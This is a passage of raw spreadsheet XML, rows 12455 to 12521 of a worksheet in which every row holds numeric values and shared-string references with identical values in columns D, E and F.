    <row r="12455" ht="15.75" customHeight="1">
      <c r="A12455" s="1">
        <v>2340.0</v>
      </c>
      <c r="B12455" s="2">
        <v>3.2986567E7</v>
      </c>
      <c r="C12455" s="2" t="s">
        <v>11971</v>
      </c>
      <c r="D12455" s="2">
        <v>1.0</v>
      </c>
      <c r="E12455" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12455" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12456" ht="15.75" customHeight="1">
      <c r="A12456" s="1">
        <v>2574.0</v>
      </c>
      <c r="B12456" s="2">
        <v>3.4249643E7</v>
      </c>
      <c r="C12456" s="2" t="s">
        <v>11972</v>
      </c>
      <c r="D12456" s="2">
        <v>1.0</v>
      </c>
      <c r="E12456" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12456" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12457" ht="15.75" customHeight="1">
      <c r="A12457" s="1">
        <v>2633.0</v>
      </c>
      <c r="B12457" s="2">
        <v>3.4594757E7</v>
      </c>
      <c r="C12457" s="2" t="s">
        <v>11973</v>
      </c>
      <c r="D12457" s="2">
        <v>1.0</v>
      </c>
      <c r="E12457" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12457" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12458" ht="15.75" customHeight="1">
      <c r="A12458" s="1">
        <v>2927.0</v>
      </c>
      <c r="B12458" s="2">
        <v>3.5882134E7</v>
      </c>
      <c r="C12458" s="2" t="s">
        <v>11974</v>
      </c>
      <c r="D12458" s="2">
        <v>1.0</v>
      </c>
      <c r="E12458" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12458" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12459" ht="15.75" customHeight="1">
      <c r="A12459" s="1">
        <v>3066.0</v>
      </c>
      <c r="B12459" s="2">
        <v>3.6512243E7</v>
      </c>
      <c r="C12459" s="2" t="s">
        <v>11975</v>
      </c>
      <c r="D12459" s="2">
        <v>1.0</v>
      </c>
      <c r="E12459" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12459" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12460" ht="15.75" customHeight="1">
      <c r="A12460" s="1">
        <v>3240.0</v>
      </c>
      <c r="B12460" s="2">
        <v>3.7360627E7</v>
      </c>
      <c r="C12460" s="2" t="s">
        <v>11976</v>
      </c>
      <c r="D12460" s="2">
        <v>1.0</v>
      </c>
      <c r="E12460" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12460" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12461" ht="15.75" customHeight="1">
      <c r="A12461" s="1">
        <v>3312.0</v>
      </c>
      <c r="B12461" s="2">
        <v>3.7601342E7</v>
      </c>
      <c r="C12461" s="2" t="s">
        <v>11977</v>
      </c>
      <c r="D12461" s="2">
        <v>1.0</v>
      </c>
      <c r="E12461" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12461" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12462" ht="15.75" customHeight="1">
      <c r="A12462" s="1">
        <v>3445.0</v>
      </c>
      <c r="B12462" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C12462" s="2" t="s">
        <v>11978</v>
      </c>
      <c r="D12462" s="2">
        <v>1.0</v>
      </c>
      <c r="E12462" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12462" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12463" ht="15.75" customHeight="1">
      <c r="A12463" s="1">
        <v>3511.0</v>
      </c>
      <c r="B12463" s="2">
        <v>3.8555687E7</v>
      </c>
      <c r="C12463" s="2" t="s">
        <v>11979</v>
      </c>
      <c r="D12463" s="2">
        <v>1.0</v>
      </c>
      <c r="E12463" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12463" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12464" ht="15.75" customHeight="1">
      <c r="A12464" s="1">
        <v>3605.0</v>
      </c>
      <c r="B12464" s="2">
        <v>3.9096489E7</v>
      </c>
      <c r="C12464" s="2" t="s">
        <v>11980</v>
      </c>
      <c r="D12464" s="2">
        <v>1.0</v>
      </c>
      <c r="E12464" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12464" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12465" ht="15.75" customHeight="1">
      <c r="A12465" s="1">
        <v>3691.0</v>
      </c>
      <c r="B12465" s="2">
        <v>3.9515643E7</v>
      </c>
      <c r="C12465" s="2" t="s">
        <v>11981</v>
      </c>
      <c r="D12465" s="2">
        <v>1.0</v>
      </c>
      <c r="E12465" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12465" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12466" ht="15.75" customHeight="1">
      <c r="A12466" s="1">
        <v>3894.0</v>
      </c>
      <c r="B12466" s="2">
        <v>4.042412E7</v>
      </c>
      <c r="C12466" s="2" t="s">
        <v>11982</v>
      </c>
      <c r="D12466" s="2">
        <v>1.0</v>
      </c>
      <c r="E12466" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12466" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12467" ht="15.75" customHeight="1">
      <c r="A12467" s="1">
        <v>4083.0</v>
      </c>
      <c r="B12467" s="2">
        <v>4.1187046E7</v>
      </c>
      <c r="C12467" s="2" t="s">
        <v>11983</v>
      </c>
      <c r="D12467" s="2">
        <v>1.0</v>
      </c>
      <c r="E12467" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12467" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12468" ht="15.75" customHeight="1">
      <c r="A12468" s="1">
        <v>4478.0</v>
      </c>
      <c r="B12468" s="2">
        <v>4.2483084E7</v>
      </c>
      <c r="C12468" s="2" t="s">
        <v>11984</v>
      </c>
      <c r="D12468" s="2">
        <v>1.0</v>
      </c>
      <c r="E12468" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12468" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12469" ht="15.75" customHeight="1">
      <c r="A12469" s="1">
        <v>4567.0</v>
      </c>
      <c r="B12469" s="2">
        <v>4.2726323E7</v>
      </c>
      <c r="C12469" s="2" t="s">
        <v>11985</v>
      </c>
      <c r="D12469" s="2">
        <v>1.0</v>
      </c>
      <c r="E12469" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12469" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12470" ht="15.75" customHeight="1">
      <c r="A12470" s="1">
        <v>4902.0</v>
      </c>
      <c r="B12470" s="2">
        <v>4.39042E7</v>
      </c>
      <c r="C12470" s="2" t="s">
        <v>11986</v>
      </c>
      <c r="D12470" s="2">
        <v>1.0</v>
      </c>
      <c r="E12470" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12470" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12471" ht="15.75" customHeight="1">
      <c r="A12471" s="1">
        <v>5236.0</v>
      </c>
      <c r="B12471" s="2">
        <v>4.5017746E7</v>
      </c>
      <c r="C12471" s="2" t="s">
        <v>11987</v>
      </c>
      <c r="D12471" s="2">
        <v>1.0</v>
      </c>
      <c r="E12471" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12471" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12472" ht="15.75" customHeight="1">
      <c r="A12472" s="1">
        <v>5294.0</v>
      </c>
      <c r="B12472" s="2">
        <v>4.5215368E7</v>
      </c>
      <c r="C12472" s="2" t="s">
        <v>11988</v>
      </c>
      <c r="D12472" s="2">
        <v>1.0</v>
      </c>
      <c r="E12472" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12472" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12473" ht="15.75" customHeight="1">
      <c r="A12473" s="1">
        <v>5371.0</v>
      </c>
      <c r="B12473" s="2">
        <v>4.5397044E7</v>
      </c>
      <c r="C12473" s="2" t="s">
        <v>11989</v>
      </c>
      <c r="D12473" s="2">
        <v>1.0</v>
      </c>
      <c r="E12473" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12473" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12474" ht="15.75" customHeight="1">
      <c r="A12474" s="1">
        <v>5380.0</v>
      </c>
      <c r="B12474" s="2">
        <v>4.5406491E7</v>
      </c>
      <c r="C12474" s="2" t="s">
        <v>11990</v>
      </c>
      <c r="D12474" s="2">
        <v>1.0</v>
      </c>
      <c r="E12474" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12474" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12475" ht="15.75" customHeight="1">
      <c r="A12475" s="1">
        <v>5484.0</v>
      </c>
      <c r="B12475" s="2">
        <v>4.5764465E7</v>
      </c>
      <c r="C12475" s="2" t="s">
        <v>11991</v>
      </c>
      <c r="D12475" s="2">
        <v>1.0</v>
      </c>
      <c r="E12475" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12475" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12476" ht="15.75" customHeight="1">
      <c r="A12476" s="1">
        <v>5675.0</v>
      </c>
      <c r="B12476" s="2">
        <v>4.634607E7</v>
      </c>
      <c r="C12476" s="2" t="s">
        <v>11992</v>
      </c>
      <c r="D12476" s="2">
        <v>1.0</v>
      </c>
      <c r="E12476" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12476" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12477" ht="15.75" customHeight="1">
      <c r="A12477" s="1">
        <v>5781.0</v>
      </c>
      <c r="B12477" s="2">
        <v>4.6736158E7</v>
      </c>
      <c r="C12477" s="2" t="s">
        <v>11993</v>
      </c>
      <c r="D12477" s="2">
        <v>1.0</v>
      </c>
      <c r="E12477" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12477" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12478" ht="15.75" customHeight="1">
      <c r="A12478" s="1">
        <v>5797.0</v>
      </c>
      <c r="B12478" s="2">
        <v>4.6784659E7</v>
      </c>
      <c r="C12478" s="2" t="s">
        <v>11994</v>
      </c>
      <c r="D12478" s="2">
        <v>1.0</v>
      </c>
      <c r="E12478" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12478" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12479" ht="15.75" customHeight="1">
      <c r="A12479" s="1">
        <v>6139.0</v>
      </c>
      <c r="B12479" s="2">
        <v>4.7818446E7</v>
      </c>
      <c r="C12479" s="2" t="s">
        <v>11995</v>
      </c>
      <c r="D12479" s="2">
        <v>1.0</v>
      </c>
      <c r="E12479" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12479" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12480" ht="15.75" customHeight="1">
      <c r="A12480" s="1">
        <v>6199.0</v>
      </c>
      <c r="B12480" s="2">
        <v>4.7959452E7</v>
      </c>
      <c r="C12480" s="2" t="s">
        <v>11996</v>
      </c>
      <c r="D12480" s="2">
        <v>1.0</v>
      </c>
      <c r="E12480" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12480" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12481" ht="15.75" customHeight="1">
      <c r="A12481" s="1">
        <v>6302.0</v>
      </c>
      <c r="B12481" s="2">
        <v>4.8231366E7</v>
      </c>
      <c r="C12481" s="2" t="s">
        <v>11997</v>
      </c>
      <c r="D12481" s="2">
        <v>1.0</v>
      </c>
      <c r="E12481" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12481" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12482" ht="15.75" customHeight="1">
      <c r="A12482" s="1">
        <v>6847.0</v>
      </c>
      <c r="B12482" s="2">
        <v>4.9637733E7</v>
      </c>
      <c r="C12482" s="2" t="s">
        <v>11998</v>
      </c>
      <c r="D12482" s="2">
        <v>1.0</v>
      </c>
      <c r="E12482" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12482" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12483" ht="15.75" customHeight="1">
      <c r="A12483" s="1">
        <v>6894.0</v>
      </c>
      <c r="B12483" s="2">
        <v>4.978501E7</v>
      </c>
      <c r="C12483" s="2" t="s">
        <v>11999</v>
      </c>
      <c r="D12483" s="2">
        <v>1.0</v>
      </c>
      <c r="E12483" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12483" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12484" ht="15.75" customHeight="1">
      <c r="A12484" s="1">
        <v>7275.0</v>
      </c>
      <c r="B12484" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C12484" s="2" t="s">
        <v>12000</v>
      </c>
      <c r="D12484" s="2">
        <v>1.0</v>
      </c>
      <c r="E12484" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12484" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12485" ht="15.75" customHeight="1">
      <c r="A12485" s="1">
        <v>7291.0</v>
      </c>
      <c r="B12485" s="2">
        <v>5.0814994E7</v>
      </c>
      <c r="C12485" s="2" t="s">
        <v>12001</v>
      </c>
      <c r="D12485" s="2">
        <v>1.0</v>
      </c>
      <c r="E12485" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12485" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12486" ht="15.75" customHeight="1">
      <c r="A12486" s="1">
        <v>7303.0</v>
      </c>
      <c r="B12486" s="2">
        <v>5.0837854E7</v>
      </c>
      <c r="C12486" s="2" t="s">
        <v>12002</v>
      </c>
      <c r="D12486" s="2">
        <v>1.0</v>
      </c>
      <c r="E12486" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12486" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12487" ht="15.75" customHeight="1">
      <c r="A12487" s="1">
        <v>7390.0</v>
      </c>
      <c r="B12487" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C12487" s="2" t="s">
        <v>12003</v>
      </c>
      <c r="D12487" s="2">
        <v>1.0</v>
      </c>
      <c r="E12487" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12487" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12488" ht="15.75" customHeight="1">
      <c r="A12488" s="1">
        <v>7467.0</v>
      </c>
      <c r="B12488" s="2">
        <v>5.1274664E7</v>
      </c>
      <c r="C12488" s="2" t="s">
        <v>12004</v>
      </c>
      <c r="D12488" s="2">
        <v>1.0</v>
      </c>
      <c r="E12488" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12488" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12489" ht="15.75" customHeight="1">
      <c r="A12489" s="1">
        <v>7492.0</v>
      </c>
      <c r="B12489" s="2">
        <v>5.1376948E7</v>
      </c>
      <c r="C12489" s="2" t="s">
        <v>12005</v>
      </c>
      <c r="D12489" s="2">
        <v>1.0</v>
      </c>
      <c r="E12489" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12489" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12490" ht="15.75" customHeight="1">
      <c r="A12490" s="1">
        <v>7816.0</v>
      </c>
      <c r="B12490" s="2">
        <v>5.2276816E7</v>
      </c>
      <c r="C12490" s="2" t="s">
        <v>12006</v>
      </c>
      <c r="D12490" s="2">
        <v>1.0</v>
      </c>
      <c r="E12490" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12490" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12491" ht="15.75" customHeight="1">
      <c r="A12491" s="1">
        <v>7840.0</v>
      </c>
      <c r="B12491" s="2">
        <v>5.23269E7</v>
      </c>
      <c r="C12491" s="2" t="s">
        <v>12007</v>
      </c>
      <c r="D12491" s="2">
        <v>1.0</v>
      </c>
      <c r="E12491" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12491" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12492" ht="15.75" customHeight="1">
      <c r="A12492" s="1">
        <v>8052.0</v>
      </c>
      <c r="B12492" s="2">
        <v>5.2880605E7</v>
      </c>
      <c r="C12492" s="2" t="s">
        <v>12008</v>
      </c>
      <c r="D12492" s="2">
        <v>1.0</v>
      </c>
      <c r="E12492" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12492" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12493" ht="15.75" customHeight="1">
      <c r="A12493" s="1">
        <v>8435.0</v>
      </c>
      <c r="B12493" s="2">
        <v>5.3946286E7</v>
      </c>
      <c r="C12493" s="2" t="s">
        <v>12009</v>
      </c>
      <c r="D12493" s="2">
        <v>1.0</v>
      </c>
      <c r="E12493" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12493" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12494" ht="15.75" customHeight="1">
      <c r="A12494" s="1">
        <v>8643.0</v>
      </c>
      <c r="B12494" s="2">
        <v>5.4339297E7</v>
      </c>
      <c r="C12494" s="2" t="s">
        <v>12010</v>
      </c>
      <c r="D12494" s="2">
        <v>1.0</v>
      </c>
      <c r="E12494" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12494" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12495" ht="15.75" customHeight="1">
      <c r="A12495" s="1">
        <v>8889.0</v>
      </c>
      <c r="B12495" s="2">
        <v>5.4786883E7</v>
      </c>
      <c r="C12495" s="2" t="s">
        <v>12011</v>
      </c>
      <c r="D12495" s="2">
        <v>1.0</v>
      </c>
      <c r="E12495" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12495" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12496" ht="15.75" customHeight="1">
      <c r="A12496" s="1">
        <v>9175.0</v>
      </c>
      <c r="B12496" s="2">
        <v>5.5347469E7</v>
      </c>
      <c r="C12496" s="2" t="s">
        <v>12012</v>
      </c>
      <c r="D12496" s="2">
        <v>1.0</v>
      </c>
      <c r="E12496" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12496" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12497" ht="15.75" customHeight="1">
      <c r="A12497" s="1">
        <v>9484.0</v>
      </c>
      <c r="B12497" s="2">
        <v>5.5895373E7</v>
      </c>
      <c r="C12497" s="2" t="s">
        <v>12013</v>
      </c>
      <c r="D12497" s="2">
        <v>1.0</v>
      </c>
      <c r="E12497" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12497" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12498" ht="15.75" customHeight="1">
      <c r="A12498" s="1">
        <v>9831.0</v>
      </c>
      <c r="B12498" s="2">
        <v>5.66354E7</v>
      </c>
      <c r="C12498" s="2" t="s">
        <v>12014</v>
      </c>
      <c r="D12498" s="2">
        <v>1.0</v>
      </c>
      <c r="E12498" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12498" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12499" ht="15.75" customHeight="1">
      <c r="A12499" s="1">
        <v>10034.0</v>
      </c>
      <c r="B12499" s="2">
        <v>5.7056969E7</v>
      </c>
      <c r="C12499" s="2" t="s">
        <v>12015</v>
      </c>
      <c r="D12499" s="2">
        <v>1.0</v>
      </c>
      <c r="E12499" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12499" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12500" ht="15.75" customHeight="1">
      <c r="A12500" s="1">
        <v>10076.0</v>
      </c>
      <c r="B12500" s="2">
        <v>5.7148162E7</v>
      </c>
      <c r="C12500" s="2" t="s">
        <v>12016</v>
      </c>
      <c r="D12500" s="2">
        <v>1.0</v>
      </c>
      <c r="E12500" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12500" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12501" ht="15.75" customHeight="1">
      <c r="A12501" s="1">
        <v>10151.0</v>
      </c>
      <c r="B12501" s="2">
        <v>5.7314341E7</v>
      </c>
      <c r="C12501" s="2" t="s">
        <v>12017</v>
      </c>
      <c r="D12501" s="2">
        <v>1.0</v>
      </c>
      <c r="E12501" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12501" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12502" ht="15.75" customHeight="1">
      <c r="A12502" s="1">
        <v>10166.0</v>
      </c>
      <c r="B12502" s="2">
        <v>5.7353222E7</v>
      </c>
      <c r="C12502" s="2" t="s">
        <v>12018</v>
      </c>
      <c r="D12502" s="2">
        <v>1.0</v>
      </c>
      <c r="E12502" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12502" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12503" ht="15.75" customHeight="1">
      <c r="A12503" s="1">
        <v>11222.0</v>
      </c>
      <c r="B12503" s="2">
        <v>2.0303155E7</v>
      </c>
      <c r="C12503" s="2" t="s">
        <v>12019</v>
      </c>
      <c r="D12503" s="2">
        <v>1.0</v>
      </c>
      <c r="E12503" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12503" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12504" ht="15.75" customHeight="1">
      <c r="A12504" s="1">
        <v>11668.0</v>
      </c>
      <c r="B12504" s="2">
        <v>2.3371146E7</v>
      </c>
      <c r="C12504" s="2" t="s">
        <v>12020</v>
      </c>
      <c r="D12504" s="2">
        <v>1.0</v>
      </c>
      <c r="E12504" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12504" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12505" ht="15.75" customHeight="1">
      <c r="A12505" s="1">
        <v>11750.0</v>
      </c>
      <c r="B12505" s="2">
        <v>2.412659E7</v>
      </c>
      <c r="C12505" s="2" t="s">
        <v>12021</v>
      </c>
      <c r="D12505" s="2">
        <v>1.0</v>
      </c>
      <c r="E12505" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12505" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12506" ht="15.75" customHeight="1">
      <c r="A12506" s="1">
        <v>11836.0</v>
      </c>
      <c r="B12506" s="2">
        <v>2.4705326E7</v>
      </c>
      <c r="C12506" s="2" t="s">
        <v>12022</v>
      </c>
      <c r="D12506" s="2">
        <v>1.0</v>
      </c>
      <c r="E12506" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12506" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12507" ht="15.75" customHeight="1">
      <c r="A12507" s="1">
        <v>12165.0</v>
      </c>
      <c r="B12507" s="2">
        <v>2.736527E7</v>
      </c>
      <c r="C12507" s="2" t="s">
        <v>12023</v>
      </c>
      <c r="D12507" s="2">
        <v>1.0</v>
      </c>
      <c r="E12507" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12507" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12508" ht="15.75" customHeight="1">
      <c r="A12508" s="1">
        <v>12297.0</v>
      </c>
      <c r="B12508" s="2">
        <v>2.8290542E7</v>
      </c>
      <c r="C12508" s="2" t="s">
        <v>12024</v>
      </c>
      <c r="D12508" s="2">
        <v>1.0</v>
      </c>
      <c r="E12508" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12508" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12509" ht="15.75" customHeight="1">
      <c r="A12509" s="1">
        <v>12386.0</v>
      </c>
      <c r="B12509" s="2">
        <v>2.8847761E7</v>
      </c>
      <c r="C12509" s="2" t="s">
        <v>12025</v>
      </c>
      <c r="D12509" s="2">
        <v>1.0</v>
      </c>
      <c r="E12509" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12509" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12510" ht="15.75" customHeight="1">
      <c r="A12510" s="1">
        <v>13458.0</v>
      </c>
      <c r="B12510" s="2">
        <v>3.5200076E7</v>
      </c>
      <c r="C12510" s="2" t="s">
        <v>12026</v>
      </c>
      <c r="D12510" s="2">
        <v>1.0</v>
      </c>
      <c r="E12510" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12510" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12511" ht="15.75" customHeight="1">
      <c r="A12511" s="1">
        <v>13597.0</v>
      </c>
      <c r="B12511" s="2">
        <v>3.5783123E7</v>
      </c>
      <c r="C12511" s="2" t="s">
        <v>12027</v>
      </c>
      <c r="D12511" s="2">
        <v>1.0</v>
      </c>
      <c r="E12511" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12511" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12512" ht="15.75" customHeight="1">
      <c r="A12512" s="1">
        <v>13734.0</v>
      </c>
      <c r="B12512" s="2">
        <v>3.6419187E7</v>
      </c>
      <c r="C12512" s="2" t="s">
        <v>12028</v>
      </c>
      <c r="D12512" s="2">
        <v>1.0</v>
      </c>
      <c r="E12512" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12512" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12513" ht="15.75" customHeight="1">
      <c r="A12513" s="1">
        <v>13795.0</v>
      </c>
      <c r="B12513" s="2">
        <v>3.6604875E7</v>
      </c>
      <c r="C12513" s="2" t="s">
        <v>12029</v>
      </c>
      <c r="D12513" s="2">
        <v>1.0</v>
      </c>
      <c r="E12513" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12513" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12514" ht="15.75" customHeight="1">
      <c r="A12514" s="1">
        <v>14503.0</v>
      </c>
      <c r="B12514" s="2">
        <v>3.9695399E7</v>
      </c>
      <c r="C12514" s="2" t="s">
        <v>12030</v>
      </c>
      <c r="D12514" s="2">
        <v>1.0</v>
      </c>
      <c r="E12514" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12514" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12515" ht="15.75" customHeight="1">
      <c r="A12515" s="1">
        <v>15136.0</v>
      </c>
      <c r="B12515" s="2">
        <v>4.1915086E7</v>
      </c>
      <c r="C12515" s="2" t="s">
        <v>12031</v>
      </c>
      <c r="D12515" s="2">
        <v>1.0</v>
      </c>
      <c r="E12515" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12515" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12516" ht="15.75" customHeight="1">
      <c r="A12516" s="1">
        <v>15177.0</v>
      </c>
      <c r="B12516" s="2">
        <v>4.2021241E7</v>
      </c>
      <c r="C12516" s="2" t="s">
        <v>12032</v>
      </c>
      <c r="D12516" s="2">
        <v>1.0</v>
      </c>
      <c r="E12516" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12516" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12517" ht="15.75" customHeight="1">
      <c r="A12517" s="1">
        <v>15308.0</v>
      </c>
      <c r="B12517" s="2">
        <v>4.2486636E7</v>
      </c>
      <c r="C12517" s="2" t="s">
        <v>12033</v>
      </c>
      <c r="D12517" s="2">
        <v>1.0</v>
      </c>
      <c r="E12517" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12517" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12518" ht="15.75" customHeight="1">
      <c r="A12518" s="1">
        <v>15378.0</v>
      </c>
      <c r="B12518" s="2">
        <v>4.2767674E7</v>
      </c>
      <c r="C12518" s="2" t="s">
        <v>12034</v>
      </c>
      <c r="D12518" s="2">
        <v>1.0</v>
      </c>
      <c r="E12518" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12518" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12519" ht="15.75" customHeight="1">
      <c r="A12519" s="1">
        <v>16380.0</v>
      </c>
      <c r="B12519" s="2">
        <v>4.6194259E7</v>
      </c>
      <c r="C12519" s="2" t="s">
        <v>12035</v>
      </c>
      <c r="D12519" s="2">
        <v>1.0</v>
      </c>
      <c r="E12519" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12519" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12520" ht="15.75" customHeight="1">
      <c r="A12520" s="1">
        <v>16389.0</v>
      </c>
      <c r="B12520" s="2">
        <v>4.6235242E7</v>
      </c>
      <c r="C12520" s="2" t="s">
        <v>12036</v>
      </c>
      <c r="D12520" s="2">
        <v>1.0</v>
      </c>
      <c r="E12520" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12520" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12521" ht="15.75" customHeight="1">
      <c r="A12521" s="1">
        <v>16414.0</v>
      </c>
      <c r="B12521" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C12521" s="2" t="s">
        <v>12037</v>
      </c>
      <c r="D12521" s="2">
        <v>1.0</v>
      </c>
      <c r="E12521" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12521" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
